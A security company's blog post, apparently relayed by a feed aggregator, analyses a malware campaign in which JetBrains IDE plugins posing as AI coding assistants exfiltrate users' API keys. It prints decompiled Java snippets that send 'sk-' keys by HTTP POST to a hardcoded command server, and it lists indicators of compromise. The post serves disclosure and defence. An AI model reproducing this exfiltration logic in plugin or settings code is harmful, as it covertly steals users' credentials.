惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

The GitHub Blog
The GitHub Blog
K
Kaspersky official blog
Stack Overflow Blog
Stack Overflow Blog
Blog — PlanetScale
Blog — PlanetScale
Recorded Future
Recorded Future
Engineering at Meta
Engineering at Meta
U
Unit 42
D
Docker
I
InfoQ
D
DataBreaches.Net
Google DeepMind News
Google DeepMind News
N
Netflix TechBlog - Medium
C
Check Point Blog
The Cloudflare Blog
美团技术团队
V
Vulnerabilities – Threatpost
博客园_首页
T
Threat Research - Cisco Blogs
Google DeepMind News
Google DeepMind News
Attack and Defense Labs
Attack and Defense Labs
A
Arctic Wolf
IT之家
IT之家
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
T
Troy Hunt's Blog
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
人人都是产品经理
人人都是产品经理
C
Cyber Attacks, Cyber Crime and Cyber Security
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
Security Archives - TechRepublic
Security Archives - TechRepublic
S
Schneier on Security
Apple Machine Learning Research
Apple Machine Learning Research
MyScale Blog
MyScale Blog
P
Privacy International News Feed
云风的 BLOG
云风的 BLOG
Recent Commits to openclaw:main
Recent Commits to openclaw:main
T
The Blog of Author Tim Ferriss
GbyAI
GbyAI
The Last Watchdog
The Last Watchdog
D
Darknet – Hacking Tools, Hacker News & Cyber Security
aimingoo的专栏
aimingoo的专栏
P
Proofpoint News Feed
The Register - Security
The Register - Security
博客园 - 三生石上(FineUI控件)
Forbes - Security
Forbes - Security
NISL@THU
NISL@THU
Y
Y Combinator Blog
T
Threatpost
Microsoft Azure Blog
Microsoft Azure Blog
L
Lohrmann on Cybersecurity

Aikido Security's Blog

GlassWorm goes native: New Zig dropper infects every IDE on your machine Aikido Attack finds multiple 0-days in Hoppscotch The cybersecurity doomerism around Mythos doesn't match what we see on the ground axios compromised on npm: maintainer account hijacked, RAT deployed Popular telnyx package compromised on PyPI by TeamPCP Aikido × Lovable: Vibe, Fix, Ship CanisterWorm Gets Teeth: TeamPCP's Kubernetes Wiper Targets Iran TeamPCP deploys CanisterWorm on NPM following Trivy compromise Security testing is validating software that no longer exists Aikido Recognized by Frost & Sullivan with the 2026 Customer Value Leadership Award in ASPM GlassWorm Hides a RAT Inside a Malicious Chrome Extension fast-draft Open VSX Extension Compromised by BlokTrooper Glassworm Strikes Popular React Native Phone Number Packages Glassworm Is Back: A New Wave of Invisible Unicode Attacks Hits Hundreds of Repositories How Security Teams Fight Back Against AI-Powered Hackers Introducing Betterleaks, an open source secrets scanner by the author of Gitleaks Trump’s 2026 cybersecurity strategy: From compliance to consequence How does AI pentesting work with compliance? What continuous pentesting actually requires Rare Not Random: Using Token Efficiency for Secrets Scanning Persistent XSS/RCE using WebSockets in Storybook’s dev server Why Determinism Is Still a Necessity in Security WAF vs. RASP vs. ADR Introducing Aikido Infinite: A new model of self-securing software How Aikido secures AI pentesting agents by design Astro Full-Read SSRF via Host Header Injection How to Get Your Board to Care About Security (Before a Breach Forces the Issue) What is Slopsquatting? The AI Package Hallucination Attack Already Happening SvelteSpill: A Cache Deception Bug in SvelteKit + Vercel Top 6 Wiz Code Alternatives Aikido recognized as Platform Leader in Latio Tech's 2026 Application Security Report From detection to prevention: How Zen stops IDOR vulnerabilities at runtime npm backdoor lets hackers hijack gambling outcomes Introducing Upgrade Impact Analysis: When breaking changes actually matter to your code Why Trying to Secure OpenClaw is Ridiculous Claude Opus 4.6 found 500 vulnerabilities. What does this change for software security? Introducing Aikido Expansion Packs: Safer defaults inside the IDE International AI Safety Report 2026: What It Means for Autonomous AI Systems Self-Securing Software: What It Is, Why It Matters, and How It Works npx Confusion: Packages That Forgot to Claim Their Own Name What Is Continuous Pentesting? Introducing Aikido Package Health: a Better Way to Trust Your Dependencies AI Pentesting: Minimum Safety Requirements for Security Testing Secure SDLC for Engineering Teams (+ Checklist) Fake Clawdbot VS Code Extension Installs ScreenConnect RAT G_Wagon: npm Package Deploys Python Stealer Targeting 100+ Crypto Wallets Gone Phishin': npm Packages Serving Custom Credential Harvesting Pages Malicious PyPI Packages spellcheckpy and spellcheckerpy Deliver Python RAT Top 10 AI Security Tools For 2026 Agent Skills Are Spreading Hallucinated npx Commands Understanding Open-Source License Risk in Modern Software The CISO Vibe Coding Checklist for Security Top 6 Graphite alternatives for AI code review in 2026 From “No Bullsh*t Security” to $1B: We Just Raised Our $60m Series B Critical n8n Vulnerability Allows Unauthenticated Remote Code Execution (CVE-2026-21858) Top 14 VS Code Extensions for 2026 AI-Driven Pentesting of Coolify: Seven CVEs Identified Top Continuous Pentesting Tools in 2026 SAST vs SCA: Securing the Code You Write and the Code You Depend On JavaScript, MSBuild, and the Blockchain: Anatomy of the NeoShadow npm Supply-Chain Attack How Engineering and Security Teams Can Meet DORA’s Technical Requirements IDOR Vulnerabilities Explained: Why They Persist in Modern Applications Shai Hulud strikes again - The golden path MongoBleed: MongoDB Zlib Vulnerability (CVE-2025-14847) and How to Fix It First Sophisticated Malware Discovered on Maven Central via Typosquatting Attack on Jackson The Fork Awakens: Why GitHub’s Invisible Networks Break Package Security Top 10 Cyber Security Tools For 2026 SAST in the IDE is now free: Moving SAST to where development actually happens AI Pentesting in Action: A TL;DV Recap of Our Live Demo The Top 7 Threat Intelligence Tools in 2026 React & Next.js DoS Vulnerability (CVE-2025-55184): What You Need to Fix After React2Shell OWASP Top 10 for Agentic Applications (2026): What Developers and Security Teams Need to Know DAST vs Pentesting v AI Pentesting: Why DAST Cannot Replace Modern Pentesting PromptPwnd: Prompt Injection Vulnerabilities in GitHub Actions Using AI Agents Top 7 Cloud Security Vulnerabilities Critical React & Next.js RCE Vulnerability (CVE-2025-55182): What You Need to Fix Now How to Comply With the UK Cybersecurity & Resilience Bill: A Practical Guide for Modern Engineering Teams Shai Hulud 2.0: What the Unknown Wonderer Tells Us About the Attackers’ Endgame SCA Everywhere: Scan and Fix Open-Source Dependencies in Your IDE Safe Chain now enforces a minimum package age before install Shai Hulud Attacks Persist Through GitHub Actions Vulnerabilities Shai Hulud Launches Second Supply-Chain Attack: Zapier, ENS, AsyncAPI, PostHog, Postman Compromised CORS Security: Beyond Basic Configuration Revolut Selects Aikido Security to Power Developer-First Software Security The Future of Pentesting Is Autonomous How Aikido and Deloitte are bringing developer-first security to enterprise Secrets Detection: A Practical Guide to Finding and Preventing Leaked Credentials Invisible Unicode Malware Strikes OpenVSX, Again AI as a Power Tool: How Windsurf and Devin Are Changing Secure Coding Building Fast, Staying Secure: Supabase’s Approach to Secure-by-Default Development OWASP Top 10 2025: Official List, Changes, and What Developers Need to Know Top 10 JavaScript Security Vulnerabilities in Modern Web Apps The Return of the Invisible Threat: Hidden PUA Unicode Hits GitHub repositorties Top 7 Black Duck Alternatives in 2026 What Is IaC Security Scanning? Terraform, Kubernetes & Cloud Misconfigurations Explained AutoTriage and the Swiss Cheese Model of Security Noise Reduction Top Software Supply Chain Security Vulnerabilities Explained The Top 7 Kubernetes Security Tools Top 10 Web Application Security Vulnerabilities Every Team Should Know What Is CSPM (and CNAPP)? Cloud Security Posture Management Explained
Multiple JetBrains IDE plugins caught stealing AI keys
Ilyas Makari · 2026-06-17 · via Aikido Security's Blog

We detected a coordinated malware campaign on the JetBrains Marketplace. At least 15 IDE plugins, published under seven vendor accounts, share the same hidden behavior. Each one exfiltrates the AI provider API key that you stored into its settings, and together they have been installed close to 70,000 times.

Every plugin poses as an AI coding assistant built on DeepSeek and other large language models, offering chat, commit messages, code review, bug finding, and unit tests. They function exactly as advertised. However, the AI provider API key you enter gets exfiltrated to a server controlled by the attacker.

The earliest versions appeared at the end of October 2025, and new ones are still being released in June 2026. The real impact is hard to measure, since download counts are easy to inflate by vendors and the marketplace listings also contain fake five star reviews.

The affected plugins are listed at the end of the article.

How the theft works

All fifteen plugins share a similar codebase that has been renamed and repackaged for each listing. To use any of them, you open the settings panel and paste in an API key for a provider such as OpenAI, SiliconFlow, or DeepSeek. The plugin needs that key to call the model on your behalf, so handing it over feels routine.

The moment you click Apply, the settings handler stores your key and also forwards it to the attacker using the save() method. The call fires immediately on key entry, with no prompt, no consent screen, and no mention anywhere in the user interface.

// runs inside the settings apply() handler, the instant you save your key
public static void save(String key) {
    if (key != null && key.startsWith("sk-") && ks.add(key) && StringUtils.length(key) == 51) {
        SoftwareDto dto = new SoftwareDto();
        dto.setApiKey(key);          // your provider secret
        BaseUtil.request("key", dto); // shipped off to the attacker server
    }
}


// the network call that leaves your machine
URL url = new URI("http://39.107.60[.]51/api/software/" + name).toURL();
connection.setRequestMethod("POST");
connection.setRequestProperty("X-Api-Key", "F48D2AA7CF341F782C1D");
byte[] input = new Gson().toJson(vo).getBytes(StandardCharsets.UTF_8); // vo holds your apiKey

The destination is a hardcoded server at 39.107.60[.]51 reached over plain HTTP, authenticated with a static token hardcoded into the plugin. Your key is sent in plaintext to an address that has nothing to do with any legitimate AI provider.

The plugins also run a paid tier. After a user pays a small fee through the donation wall built into the plugin, the server sends an API key back down to the client, and the plugin starts using that key for its model calls instead of your own, which is bizarre, since no legitimate operator would simply hand a user a working and unrestricted key to a paid AI provider.

WebResult webResult = BaseUtil.request("check", vo);
if (webResult.isSuccess()) {
    key = data.getApiKey();  // a key handed back by the attacker server
}


// the plugin always prefers the server supplied key
public static String getKey() {
    return StringUtils.defaultIfBlank(BaseState.key, Value.getKey());
}

A possible theory is that one group of victims pastes in their own keys, which the server harvests. A second group pays the operator and receives a working key in return. The keys handed to paying users may well be the keys stolen from everyone else, turning the campaign into a service that resells other people's stolen API access. The operator collects money on one side and free credentials on the other, while the genuine key owners pay the bill.

Why attackers keep aiming at IDEs

Editor plugin ecosystems have become a frequent target of supply chain attacks, with ongoing campaigns such as GlassWorm hitting VS Code. Developer machines are a high value target, and the IDE sits at the center of them. It holds source code, cloud credentials, signing keys, and now the API keys for paid AI services that can be resold or burned for compute. A plugin runs unsandboxed inside the IDE, inside a tool that people trust and leave open all day, which makes it an ideal hiding place for code that only misbehaves in the background. 

JetBrains plugins do go through a manual review process before they reach the marketplace, yet a small piece of logic buried inside an otherwise working plugin can still slip through. Treat a plugin the same way you would treat any dependency that runs with your privileges, and be cautious about pasting long lived secrets into tools you have not vetted.

How Aikido detects this

If you are an Aikido user, check your central feed and filter on malware issues. This will surface as a 100/100 critical issue. Aikido rescans nightly, but we recommend triggering a manual rescan now.

If you are not yet an Aikido user, you can create an account and connect your repos. Our malware coverage is included in the free plan, no credit card required.

For broader coverage across your whole team, Aikido's Device Protection gives you visibility and control over the software packages installed on your team's devices. It covers browser extensions, code libraries, IDE plugins, and build dependencies, all in one place. Stop malware before it gets installed.

For future protection, consider Aikido Safe Chain (open source). Safe Chain sits in your existing workflow, intercepting npm, npx, yarn, pnpm, and pnpx commands and checking packages against Aikido Intel before install.

Indicators of Compromise

Network indicators

  • C2 server IP: 39.107.60[.]51

Affected plugins (name and plugin id)

  • DeepSeek Junit Test (org.sm.yms.toolkit) – 1,121 downloads, released 2025-10-31
  • DeepSeek Git Commit (com.json.simple.kit) – 1,894 downloads, released 2025-11-01
  • DeepSeek FindBugs (org.bug.find.tools) – 1,485 downloads, released 2025-11-09
  • DeepSeek AI Chat (org.translate.ai.simple) – 1,317 downloads, released 2025-11-23
  • DeepSeek Dev AI (com.yy.test.ai.simple) – 740 downloads, released 2025-11-30
  • DeepSeek AI Coding (com.dev.ai.toolkit) – 450 downloads, released 2025-12-06
  • AI FindBugs (com.json.view.simple) – 623 downloads, released 2025-12-14
  • AI Git Commitor (com.my.git.ai.kit) – 301 downloads, released 2026-01-10
  • AI Coder Review (org.check.ai.ds) – 735 downloads, released 2026-01-11
  • DeepSeek Coder AI (com.review.tool.code) – 3,498 downloads, released 2026-01-15
  • AI Coder Assistant (org.code.assist.dev.tool) – 319 downloads, released 2026-02-01
  • DeepSeek Code Review (com.coder.ai.dpt) – 278 downloads, released 2026-04-18
  • CodeGPT AI Assistant (com.my.code.tools) – 25,571 downloads, released 2026-06-09
  • DeepSeek AI Assist (ord.cp.code.ai.kit) – 27,727 downloads, released 2026-06-10
  • Coding Simple Tool (com.dp.git.ai.tool) – 3,931 downloads, no online versions

Vendor accounts

  • CodePilot (mycode)
  • StackSmith (misshewei)
  • CodeCrafter (keteme)
  • CodeWeaver (simpledev)
  • JetCode (skyblue)
  • DailyCode (dialycode)
  • ZenCoder (947cb4c8-5db1-4cf0-8182-0aae7c433bb3)